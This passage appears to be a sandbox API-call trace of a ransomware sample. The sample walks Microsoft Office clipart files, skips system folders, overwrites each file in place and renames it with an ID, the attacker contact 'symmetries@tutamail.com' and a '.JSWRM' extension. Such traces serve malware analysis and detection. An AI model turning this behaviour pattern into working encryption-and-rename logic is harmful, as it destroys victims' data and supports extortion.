lpDistanceToMoveHigh=0x0) returned 0x0 [0093.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x75e0) returned 0x24d210 [0093.092] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x75e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x75e0, lpOverlapped=0x0) returned 1 [0093.097] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.097] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x75e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x75e0, lpOverlapped=0x0) returned 1 [0093.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.098] CloseHandle (hObject=0x314) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0093.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0093.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0093.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0093.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0093.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.098] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02262_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02262_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02262_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0093.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0093.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0093.099] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x824e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02263_.WMF", cAlternateFileName="")) returned 1 [0093.099] lstrcmpiW (lpString1="PE02263_.WMF", lpString2=".") returned 1 [0093.099] lstrcmpiW (lpString1="PE02263_.WMF", lpString2="..") returned 1 [0093.099] lstrcmpiW (lpString1="PE02263_.WMF", lpString2="...") returned 1 [0093.099] lstrcmpiW (lpString1="PE02263_.WMF", lpString2="windows") returned -1 [0093.099] lstrcmpiW (lpString1="PE02263_.WMF", lpString2="recovery") returned -1 [0093.099] lstrcmpiW (lpString1="PE02263_.WMF", lpString2="perflogs") returned -1 [0093.099] lstrcmpiW (lpString1="PE02263_.WMF", lpString2="documents and settings") returned 1 [0093.099] lstrcmpiW (lpString1="PE02263_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.100] lstrcmpiW (lpString1="PE02263_.WMF", lpString2="system volume information") returned -1 [0093.100] lstrcmpiW (lpString1="PE02263_.WMF", lpString2="msocache") returned 1 [0093.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0093.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02263_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02263_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02263_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0093.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02263_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02263_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02263_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0093.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0093.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0093.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02263_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02263_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.101] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33358) returned 1 [0093.101] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8240) returned 0x24d210 [0093.102] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8240, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8240, lpOverlapped=0x0) returned 1 [0093.106] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.106] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8240, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8240, lpOverlapped=0x0) returned 1 [0093.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.107] CloseHandle (hObject=0x314) returned 1 [0093.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0093.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0093.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0093.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0093.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0093.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0093.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0093.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0093.107] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02263_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02263_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02263_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02263_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0093.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0093.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0093.108] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x62b2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02265_.WMF", cAlternateFileName="")) returned 1 [0093.108] lstrcmpiW (lpString1="PE02265_.WMF", lpString2=".") returned 1 [0093.108] lstrcmpiW (lpString1="PE02265_.WMF", lpString2="..") returned 1 [0093.108] lstrcmpiW (lpString1="PE02265_.WMF", lpString2="...") returned 1 [0093.108] lstrcmpiW (lpString1="PE02265_.WMF", lpString2="windows") returned -1 [0093.109] lstrcmpiW (lpString1="PE02265_.WMF", lpString2="recovery") returned -1 [0093.109] lstrcmpiW (lpString1="PE02265_.WMF", lpString2="perflogs") returned -1 [0093.109] lstrcmpiW (lpString1="PE02265_.WMF", lpString2="documents and settings") returned 1 [0093.109] lstrcmpiW (lpString1="PE02265_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.109] lstrcmpiW (lpString1="PE02265_.WMF", lpString2="system volume information") returned -1 [0093.109] lstrcmpiW (lpString1="PE02265_.WMF", lpString2="msocache") returned 1 [0093.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02265_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02265_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02265_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02265_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02265_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02265_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0093.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0093.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0093.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.109] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=25266) returned 1 [0093.109] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x62b0) returned 0x24d210 [0093.110] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x62b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x62b0, lpOverlapped=0x0) returned 1 [0093.114] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.114] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x62b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x62b0, lpOverlapped=0x0) returned 1 [0093.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.114] CloseHandle (hObject=0x314) returned 1 [0093.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0093.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0093.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0093.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0093.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0093.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0093.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0093.115] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02265_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02265_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02265_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0093.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0093.115] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x78e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02267_.WMF", cAlternateFileName="")) returned 1 [0093.115] lstrcmpiW (lpString1="PE02267_.WMF", lpString2=".") returned 1 [0093.115] lstrcmpiW (lpString1="PE02267_.WMF", lpString2="..") returned 1 [0093.116] lstrcmpiW (lpString1="PE02267_.WMF", lpString2="...") returned 1 [0093.116] lstrcmpiW (lpString1="PE02267_.WMF", lpString2="windows") returned -1 [0093.116] lstrcmpiW (lpString1="PE02267_.WMF", lpString2="recovery") returned -1 [0093.116] lstrcmpiW (lpString1="PE02267_.WMF", lpString2="perflogs") returned -1 [0093.116] lstrcmpiW (lpString1="PE02267_.WMF", lpString2="documents and settings") returned 1 [0093.116] lstrcmpiW (lpString1="PE02267_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.116] lstrcmpiW (lpString1="PE02267_.WMF", lpString2="system volume information") returned -1 [0093.116] lstrcmpiW (lpString1="PE02267_.WMF", lpString2="msocache") returned 1 [0093.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0093.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02267_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02267_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02267_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0093.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0093.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02267_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02267_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02267_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0093.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0093.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0093.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.117] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30944) returned 1 [0093.117] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x78e0) returned 0x24d210 [0093.117] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x78e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x78e0, lpOverlapped=0x0) returned 1 [0093.124] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.124] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x78e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x78e0, lpOverlapped=0x0) returned 1 [0093.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.125] CloseHandle (hObject=0x314) returned 1 [0093.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0093.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0093.125] MultiByteToWideChar (in: 